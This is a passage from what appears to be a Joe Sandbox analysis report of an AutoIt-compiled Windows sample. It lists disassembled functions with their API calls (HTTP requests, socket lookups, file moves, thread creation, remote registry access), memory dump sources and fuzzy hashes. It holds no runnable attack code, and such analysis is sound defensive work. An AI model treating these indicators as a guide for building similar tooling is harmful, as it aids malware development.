                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                        • String ID: @COM_EVENTOBJ
                                                                                                        • API String ID: 327565842-2228938565
                                                                                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                        APIs
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                        • String ID: H
                                                                                                        • API String ID: 3613100350-2852464175
                                                                                                        • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                        • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                        APIs
                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1291720006-3916222277
                                                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                        Strings
                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• _wcslen.LIBCMT ref: 004335F2
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
• Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
• Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
• Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
• Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
APIs
• GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
• LoadStringW.USER32(00000000), ref: 00434060
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
• LoadStringW.USER32(00000000), ref: 00434078
• _wprintf.LIBCMT ref: 004340A1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0043409C
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
• Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
• __lock.LIBCMT ref: 00417981
  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
• InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
• __lock.LIBCMT ref: 004179A2
• ___addlocaleref.LIBCMT ref: 004179C0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL$pI
• API String ID: 637971194-197072765
• Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
• Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
• Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
• Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1938898002-0
                                                                                                        • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                        • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                        APIs
                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                        • _memmove.LIBCMT ref: 0044B555
                                                                                                        • _memmove.LIBCMT ref: 0044B578
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2737351978-0
                                                                                                        • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                        • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                        APIs
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                                                                        • __getptd.LIBCMT ref: 00415253
                                                                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                        • _free.LIBCMT ref: 0041529E
                                                                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3638380555-0
                                                                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                        APIs
                                                                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                        • API String ID: 3207048006-625585964
                                                                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                        APIs
                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                        • _memmove.LIBCMT ref: 004656CA
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2945290962-0
                                                                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1457242333-0
                                                                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
